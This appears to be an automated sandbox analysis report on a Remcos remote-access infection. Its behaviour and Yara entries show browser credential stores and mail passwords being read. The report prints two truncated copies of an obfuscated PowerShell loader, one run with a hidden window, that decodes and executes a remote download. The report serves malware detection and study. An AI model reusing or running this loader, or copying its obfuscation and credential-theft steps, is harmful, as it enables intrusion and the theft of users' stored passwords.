Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#paremernes duplicature udvejer dataservicens treasury ostleress uninterdicted #>;$cryoscopy='grusgrav';<#dubbe bantustamme nyvurderende tripudiate mitigated #>; function dark($misligholdelsers){if ($host.debuggerenabled) {$differentieringens++;}$sadomasochism=$cariss+$misligholdelsers.'length'-$differentieringens; for( $unacute27=4;$unacute27 -lt $sadomasochism;$unacute27+=5){$unaccommodable=$unacute27;$enforth+=$misligholdelsers[$unacute27];$cutireaction='blomstringstiderne';}$enforth;}function nondeclaratively($budcyklen){ . ($dolomitternes) ($budcyklen);}$skrllede=dark 'staimc clo eftzf stiragelri elstyra ogn/thra ';$stupiditetens=dark 'kryptsvenl presu ne1 nde2unav ';$unpliantness=' lus[mashnfldee my t fal.anthsd coehistrru dvs stiengrcbefaetilgptorto bogisangnopsptma.imnonfa awnnskruasamlglibeezygor lit]vaga:sovj:alecsmyogecuphcp esugennrdisci c atskjuy basp iggrv.rgo ga tgoniocam.c.eclotrevlsvrm= ven$net sendetconcu.seuptomairovedgoveifagkt unme tratgastefravn r.ms unp ';$skrllede+=dark 'regi5majo.mau.0 opd simo(tip wter if lgnchrodbusho priw .orsunsh j,nsn moltbuff fora1side0fod ..ast0ni n;vilj anfgw kreieftenmaka6svir4unpr;str, parxline6 uns4.nde;beru beedrafkavgoat:gene1 un 3sang1 up.miss0fo m) mor aandgdiskeree cturbkmorpo dta/nive2 res0drop1slad0skuf0arch1k,nd0.dst1 ri tetfaeroi conrstofe ,lifenteo ,dkxtreu/a,te1v ra3cod 1 hdr.fo r0etym ';$signatarmagters=dark ' reu fyrsbivoe posrile - alasneag wayeisodn j mtge e ';$beskftigelsesinteressen=dark 'hre hs pettraft nkp ka,sloai:inex/ co /downeconivyn leundesintaeverdc tmrrcaroeolivtprin.m,timgou acyl /lokam,adeigarasrecefautoo ylbrforlsl.rat,orpa pina po e.egil slfs wifekbenr retnreckerejs. autp,heesgroum,itr ';$unacute27mpastoed=dark 'volu> nyt ';$dolomitternes=dark 'archiconseforbx skr ';$nyhedsbureauernes='forfatningsdomstol';$cynography='\satisfiable.ins';nondeclaratively (dark 'hort$amphgsyrilla gobo abvaa ash nl und:vellsfdsektestimasslbys.s we,msteristilsstokshan est erguld1reva8 rov=rumi$ fleegiarnunsuvcons: efeat rbpmicrph lkdspriaantitforsacoli+unfo$ges.cfo.lykam nsta oop,jgfallr bria .enptrashbarkyhyae ');nondeclaratively (dark ' ,ns$lavtgmonsl vinocharb c aacatcl d,n:sc,pksambl regal ngr ymplspriapsy gimmotba.kehortsgdni= par$savsbmicrediscsbrackmel fpyr ttilbi,oncgbe oe timlenchsbuckebrnesexosigasen,akltblgee ranr r,sechrosunpesrek,e eu ndise. daysfolkpredelin bipucktmed (rage$picaumetanclamaudstcpastua tetaeroe kse2 er7gt,emla,dp.tagavaans ikotbarbopulseungrdsamf)himm ');nondeclaratively (dark $unpliantness);$beskftigelsesinteressen=$klarlagtes[0];$kakar=(dark 'tr.i$tut g denlr.adovrdibcru awordls.de:.pkagskadrove,uoronnarkideft v edgoopfal.rendfdese ,ron omgsputr= bednslamed mpw rad-vapoofeatb intjp lieka,scremsthumi fodbs hiy ad,ssurrts.ioeskosmtils. aefnopbyewhartlykk. rebw a.se albbcommcf rllan,eisla,esam n pietseku ');nondeclaratively ($kak
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#paremernes duplicature udvejer dataservicens treasury ostleress uninterdicted #>;$cryoscopy='grusgrav';<#dubbe bantustamme nyvurderende tripudiate mitigated #>; function dark($misligholdelsers){if ($host.debuggerenabled) {$differentieringens++;}$sadomasochism=$cariss+$misligholdelsers.'length'-$differentieringens; for( $unacute27=4;$unacute27 -lt $sadomasochism;$unacute27+=5){$unaccommodable=$unacute27;$enforth+=$misligholdelsers[$unacute27];$cutireaction='blomstringstiderne';}$enforth;}function nondeclaratively($budcyklen){ . ($dolomitternes) ($budcyklen);}$skrllede=dark 'staimc clo eftzf stiragelri elstyra ogn/thra ';$stupiditetens=dark 'kryptsvenl presu ne1 nde2unav ';$unpliantness=' lus[mashnfldee my t fal.anthsd coehistrru dvs stiengrcbefaetilgptorto bogisangnopsptma.imnonfa awnnskruasamlglibeezygor lit]vaga:sovj:alecsmyogecuphcp esugennrdisci c atskjuy basp iggrv.rgo ga tgoniocam.c.eclotrevlsvrm= ven$net sendetconcu.seuptomairovedgoveifagkt unme tratgastefravn r.ms unp ';$skrllede+=dark 'regi5majo.mau.0 opd simo(tip wter if lgnchrodbusho priw .orsunsh j,nsn moltbuff fora1side0fod ..ast0ni n;vilj anfgw kreieftenmaka6svir4unpr;str, parxline6 uns4.nde;beru beedrafkavgoat:gene1 un 3sang1 up.miss0fo m) mor aandgdiskeree cturbkmorpo dta/nive2 res0drop1slad0skuf0arch1k,nd0.dst1 ri tetfaeroi conrstofe ,lifenteo ,dkxtreu/a,te1v ra3cod 1 hdr.fo r0etym ';$signatarmagters=dark ' reu fyrsbivoe posrile - alasneag wayeisodn j mtge e ';$beskftigelsesinteressen=dark 'hre hs pettraft nkp ka,sloai:inex/ co /downeconivyn leundesintaeverdc tmrrcaroeolivtprin.m,timgou acyl /lokam,adeigarasrecefautoo ylbrforlsl.rat,orpa pina po e.egil slfs wifekbenr retnreckerejs. autp,heesgroum,itr ';$unacute27mpastoed=dark 'volu> nyt ';$dolomitternes=dark 'archiconseforbx skr ';$nyhedsbureauernes='forfatningsdomstol';$cynography='\satisfiable.ins';nondeclaratively (dark 'hort$amphgsyrilla gobo abvaa ash nl und:vellsfdsektestimasslbys.s we,msteristilsstokshan est erguld1reva8 rov=rumi$ fleegiarnunsuvcons: efeat rbpmicrph lkdspriaantitforsacoli+unfo$ges.cfo.lykam nsta oop,jgfallr bria .enptrashbarkyhyae ');nondeclaratively (dark ' ,ns$lavtgmonsl vinocharb c aacatcl d,n:sc,pksambl regal ngr ymplspriapsy gimmotba.kehortsgdni= par$savsbmicrediscsbrackmel fpyr ttilbi,oncgbe oe timlenchsbuckebrnesexosigasen,akltblgee ranr r,sechrosunpesrek,e eu ndise. daysfolkpredelin bipucktmed (rage$picaumetanclamaudstcpastua tetaeroe kse2 er7gt,emla,dp.tagavaans ikotbarbopulseungrdsamf)himm ');nondeclaratively (dark $unpliantness);$beskftigelsesinteressen=$klarlagtes[0];$kakar=(dark 'tr.i$tut g denlr.adovrdibcru awordls.de:.pkagskadrove,uoronnarkideft v edgoopfal.rendfdese ,ron omgsputr= bednslamed mpw rad-vapoofeatb intjp lieka,scremsthumi fodbs hiy ad,ssurrts.ioeskosmtils. aefnopbyewhartlykk. rebw a.se albbcommcf rllan,eisla,esam n pietseku ');nondeclaratively ($kakar);nondeclaratively (da Jump to behavior
Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: msiexec.exe, 0000000A.00000003.2724664093.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.dr Binary or memory string: [Program Manager]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy, 18_2_0041881C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 19_2_004082CD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0041739B GetVersionExW, 18_2_0041739B

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0000000A.00000003.2724664093.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2704808533.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: ESMTPPassword 19_2_004033F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword 19_2_00402DB3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword 19_2_00402DB3
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 2032, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-ASN50U Jump to behavior
Source: Yara match File source: 0000000A.00000003.2724664093.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2704808533.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs